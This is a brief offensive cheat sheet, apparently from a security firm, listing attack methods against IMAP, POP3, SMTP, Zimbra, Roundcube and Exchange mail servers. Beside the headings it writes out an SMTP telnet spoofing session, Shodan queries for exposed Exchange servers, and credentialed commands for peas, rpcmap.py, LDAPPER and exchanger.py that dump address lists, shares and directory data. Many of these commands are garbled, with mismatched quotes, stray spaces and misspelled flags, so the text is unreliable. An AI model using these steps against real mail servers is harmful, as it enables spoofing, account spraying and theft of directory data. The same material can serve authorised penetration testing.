Mail-Server-Attacks-Cheat-Sheet
A cheat sheet that contains common enumeration and attack methods for Mail Server.
Brought to you by:
HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.
IMAP
- Information Gathering
- Attacks
* NTLM Auth
* Bruteforce
POP3
- Information Gathering
- Attacks
* NTLM Auth
* Bruteforce
SMTP
- Information Gathering
- Attacks
* NTLM Auth
* Bruteforce
* Spoofing
* Non Auth
telnet [IP] [25 or 465 or 587]
MAIL FROM: sender@adress.ext
RCPT TO: recipient@adress.ext
SUBJECT: Test message
.
Zimbra
- Information Gathering
- Attacks
* Misconfiguration
* Anti-Malware
* ActiveSync(LDAP)
* ActiveSync(SMB Share)
* Phishing
* Known Vuln
* Spray
Roundcube
- Information Gathering
- Attacks
* Anti-Malware
* ActiveSync(LDAP)
* ActiveSync(SMB Share)
* Phishing
* Known Vuln
* Spray
Microsoft Exchange
- Information Gathering
shodan search "'X-AspNet-Version http.title:'Outlook' –'x-owa-version'"
shodan search "http.favicon.hash:44274939"
shodan search "http.title:outlook exchange"
- Attacks
* AutotDiscover
* Known Vuln
* Spray
* NTLM Auth
* NTLMRelay
* GAL
Get-GlobalAddressList -ExchHostname mail.domain.com -UserName
domain\username -Password password -OutFile global-address-list.
* Exchange Admin Group Deligation
* Rule
* Forms
* Anti-Malware
* ActiveSync(LDAP)
* ActiveSync(SMB Share)
* ActiveSync(WSS)
peas -U ' EVIL.DEC\user’ -p ‘password’ exch01.evil.dev - -smb-user=‘EVIL\sharepoint-setup'
• - smb-pass=' password’ •-list-unc 'http://SHP01/share’
* RPC
rpcmap . py -debug -auth-transport’EVIL/user:password’
'ncacn http: /6001,RpcProxy=mail.evil.dev: 443]'
rpcmap.py -debug -auth-transport 'EVIL/user:password' -auth-rpc 'EVIL/mia:password' -auth-level 6 -brute-opnums 'ncacn_http:[6001,RpcProxy=mail.evil.dev:443]'
* LDAP
LDAPPER. py -D EVIL - U 'Administrator' -P ‘password’ -S DC01. EVIL.DEV
(mail=user@evil.dev) mail objectGUID legacyExchangeDN distinguishedName
exchanger. py EVIL/user: ‘password’@mail.evil.dev nspi
dump -tables -name Hackers -lookup-tvpe EXTENDED